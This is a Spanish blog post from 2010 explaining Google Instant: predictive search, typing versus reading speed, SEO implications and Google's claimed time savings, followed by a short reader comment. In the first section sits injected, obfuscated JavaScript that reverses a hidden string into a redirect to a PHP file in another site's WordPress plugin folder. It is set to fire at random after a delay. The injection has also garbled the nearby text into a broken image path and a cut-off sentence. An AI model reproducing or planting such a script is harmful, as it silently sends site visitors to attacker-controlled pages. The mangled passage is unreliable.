¿Qué es Google Instant?

 ¿Qué es Google Instant? Google Instant es una nueva función de búsqueda que muestra resultados mientras escribes. Es predictivo e instantáneo e irá adaptando los resultados de la búsqueda a medida que vas tecleando.

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos/2010/09/google-instanta-reduccion-tiempo-busquedas.jpg”>tos momentos para poder utilizarlo en España es necesario estar logado en tu cuenta de Google, ir entonces al buscador y activar una invitación a probarlo, aunque según a anunciado Google en Estados Unidos,  en breve será la opción por defecto en todos los buscadores.

¿Por qué Google Instant? Los usuarios teclean despacio pero leen con rapidez,  entre cada pulsación hay un lapso de tiempo de 300 milisegundos. Sin embargo, en solo 30 milisegundos el ojo humano es capaz de mover su centro de atención a diferentes partes de la página. Esto significa que el usuario es capaz de ver resultados al mismo tiempo que escribe una búsqueda.

Posicionamiento en buscadores: Obviamente el SEO se va ver afectado por estas búsquedas y aunque aún no está claro como, perece evidente que las “long tails” van a cobrar más importancia si cabe.
¿Sabías que según Google…?
•Antes de Google Instant un usuario medio hacía una búsqueda en más de 9 segundos. Incluso hemos visto casos de búsquedas de entre 30 y 90 segundos.
•Google Instant puede ahorrar entre 2 y 5 segundos por búsqueda.
•Si Google Instant se utilizara de forma global, estimamos que se ahorrarían más de 3.500 millones de segundos al día, unas 11 horas cada segundo.
•La función Google Instant es posible gracias a 15 nuevas tecnologías.
Puedes ver más información oficial en 
Google Instant

¿Usabilidad? Yo lo he probado ya y parece user friendly, pero hasta que no lo testeemos con distintas búsquedas no podremos saberlo. Lo que es seguro es que esta tecnología va a cambiar la forma de comportarse del usuario al realizar las búsquedas y por lo tanto tendremos que adaptar nuestras estrategias de marketing online para adaptarnos al comportamiento del usuario, una vez más, que no la última…
 Fuente

Comentario:
y añado este link para tener en youtube parecida busqueda que va mostrando videos encontrados a medida que se va entrando la búsqueda:
youtube instant

saludos

ms, 11-9-2010

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies